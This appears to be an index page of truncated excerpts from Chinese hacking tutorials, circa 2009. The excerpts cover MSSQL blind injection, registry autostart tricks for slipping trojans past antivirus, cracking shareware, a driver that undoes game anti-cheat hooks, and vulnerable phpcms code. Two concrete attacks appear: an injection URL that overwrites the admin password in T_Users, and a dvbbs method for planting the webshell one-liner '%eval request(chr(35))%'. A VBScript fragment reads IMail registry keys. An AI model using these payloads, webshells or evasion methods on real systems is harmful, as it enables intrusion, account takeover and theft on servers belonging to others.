操作环境:马克斯版本,因为他的数据库是有防注入的，和动网等一切的防数据库下载的程序都很差不多。。 而我这一个操作却是可以突破。并是用什么闭合。。闭合的话。我们前提条件是需要知道%方向.而此次我们只 需要知道他的表名(防下载表)即

好多人贴了2005注入语句，基本是显错模式的，如果显错，很多工具还是可以用的；但盲注，工具貌似就不咋地了，pangolin注不了2005，其他2005注入的注入工具对于盲注貌似也很感冒；网上没几个盲注语句，于是平时用到的时候自己写，现在贴出

利用对方服务器漏洞远程注册DLL 我和朋友一起下载了一个相同的组件，苦于无法注册而没用，但最近我发现他在使用这个组件，显然是已经注册了，好奇怪，他是怎么注册的呢？我问他他不说。 其实，我们在ASP中，是有捷径远程注册DLL的，但需要

有时候，我们通过数据库备份一个批处理到启动菜单后，希望服务器在下次重启时运行我们的批处理。可是我们等啊等，服务器就是不重启，怎么办? 让管理员帮我们重启一下吧。呵呵 　　以下注入代码让服务器停止响应，或响应很慢，要取得更好的

为了让大家对破解有个整体概念，我做了一张破解流程图。大家通过图可以看出，破解的最后结果有两种。一是修改代码，进行暴力破解。另一种是推出算法，写出注册机；看图上箭头方向可知：暴力破解,有三个途径：1. 查壳——反编译——追踪调

Microsoft IE CFunctionPointer函数内存破坏漏洞（MS09-002）发布时间:2009-02-10影响版本:Microsoft Internet Explorer 7.0 漏洞描述:BUGTRAQ ID: 33627 CVE(CAN) ID: CVE-2009-0075Comment by Friddy:这个实际不是个破坏内存的漏洞，

作者：FireFox[F.s.T]文章投稿于09年2月黑客手册http://www.nohack.cn/经编辑同意放出 目的是为与大家有更好的交流 更多精彩内容请参阅 黑客手册背景：所谓补丁或者更新，一直以来是研发方为更新产品安全问题、增加新功能或提高运行效率而

一般的木马运行添加自启动就会被杀毒软件的主动防御或者360拦截,前几天在网上发现了几个注册表自启动的方法,效果还不错,也算是目前主动防御的一大死角了,连微点竟然也拦截不到.1.cmd运行前执行的程序(被动启动)HKEY_CURRENT_USER\Softwar

作者：幻泉[B.S.N]受影响程序： phpcms2008 gbk漏洞文件：ask/search_ajax.php漏洞等级：高漏洞说明：/ask/search_ajax.phpPHP代码if($q) { $where = " title LIKE '%$q%' AND status = 5";//没做过滤直接感染了$where } else { exi

为了考验，庸庸碌碌的过了半年。现在终于出头了，现在又忙于毕业设计（软件界面美化和驱动文件加壳），没空学习内核知识 。今天特把以前的一些想法发出来，大家讨论讨论。 在网上找了一下，谈文件隐藏的不少，说如何检测隐藏文件的好像不

我等小菜自己写不来asp马，只能用大虾写的，但网上流传的都不知道是几手的了难免有些居心不良的人会在里面加后门。好不容易拿到个shell又被别人偷走了怎么甘心啊！所以在下完asp木马后要先检查有没后门，通常加了后门的为了隐秘性，都会加

0×00 为什么我们会有这个想法0×01 web应用程序中后门的基本思想0×02 实际应用中的一些例子0×00 为什么我们会有这个想法毫无疑问，web是近几年的热点，各种各样的服务都开始网络化，用户的敏感信息也开始不只是存储在自己的计算机里，而开

sqlsus是一个比较不错的mysql注射工具，感觉最好用的两点就是注射获取数据速度非常快，另外一个最大的特点就是自动搜索可写目录，上传webshell，我们找到他的功能实现代码进行分析# TODO handle src tags rather than just img srcsub up

现在大多数网络游戏都使用驱动级的反外挂保护,使其他程序无法获得其游戏窗口句柄，下面驱动代码可以恢复被TesSafe.sys Hook掉的API。#include ntddk.h#include windef.h#include ntimage.h#include "Common.h"typedef struct _KAPC_STATE

function Copyright(){var Author=”80sec”;var Email=”kEvin#80sec.com”.replace(”#”,”@”)var Site=”http://www.80sec.com”;var Date=new Date(2009,4,24).toLocaleString();var Reference=”http://www.80sec.com/Microsoft-I

破 顾名思义就是暴力修改程序的代码来达到破解的目的 当然根据共享软件的注册方式我们可以对症下药比如说没有注册的软件有功能限制、使用次数限制、使用日期限制等 我们就可以分别对待了！我们只需要解除这些限制自然就达到了破解的目的了

|=---------------------------------------------------------------------------=||=---------------=[ 利用窗口引用漏洞和XSS漏洞实现浏览器劫持 ]=---------------=||=------------------------------------------------------------

该漏洞位于 Room目录下的Chase.aspx文件，由于LotteryID 没有进行安全检查，导致注入漏洞发生。EXP如下Room/Chase.aspx?LotteryID=28 ; update T_Users Set Password='xx' where ID=1http://hi.baidu.com/isbx/blog/item/bee2d31b7ab4bdd

在实战中我们常常面临这样的困境：我们感觉到目标网站采用的是一套开放的源码，但是由站长对页面的修改抹杀了能够直接获取这套源码名称的显性标志。这对我们的破解显然是不利的，我们可能会为了找到源码来研究而疲于到各大下载网站下载类

首先有必要先讲几个名词，有助于理解本文：名词解析[1] 探查（DETERMINE）：“猜测”（GUESSING），尽可能准确地猜测远端主机所用操作系统。[2] 错误（ERROROUS）：“不正确的”（INCORRECT）。指发送至远端主机行式打印机守护进程的请求

作者：MJ0011 2009.05.13感谢：Iceboy发现此问题并提供DUMP漏洞厂商及产品：Microsoft Windows 7 rc 7100 090421存在漏洞组件：win32k.sys Timestamp :49ee8dc8存在漏洞函数:NtUserGetDc/NtUserGetDcEx漏洞描述：Win32k.sys是WINDOWS的GD

　　一直以来都以为只有空格，tab键和注释符/**/可以用来切割sql关键字，段时间在邪八看了风迅cms注入漏洞那篇帖子，才知道原来回车也可以用来作为分割符（以前竟然没有想到，真是失败）。回车的ascii码是chr(13)&chr(10)，至于为什么要两

dvbbs删除upload.inc后得shell得方法 - 前提是得到前后台管理权限 进入后台后 先到用户管理 随便改个人的邮件地址为 %eval request(chr(35))%@163.com 保存后 找到 邮件列表导出 然后导出邮件列表到文本 把文件名的名字改为.

信息来源：邪恶八进制信息安全团队（www.eviloctal.com）文章作者：fhod帝国备份王(Empirebak)简介EmpireBak是一款完全免费、专门为Mysql大数据的备份与导入而设计的软件,系统采用分卷备份与导入,理论上可备份任何大小的数据库.可在 http

+展开-VBScriptonerrorresumenextconstHKEY_LOCAL_MACHINE=&H80000002strComputer="."SetoReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\"&_strComputer&"\root\default:StdRegProv")strKeyPath="SOFTWARE\Ipswitch\IMail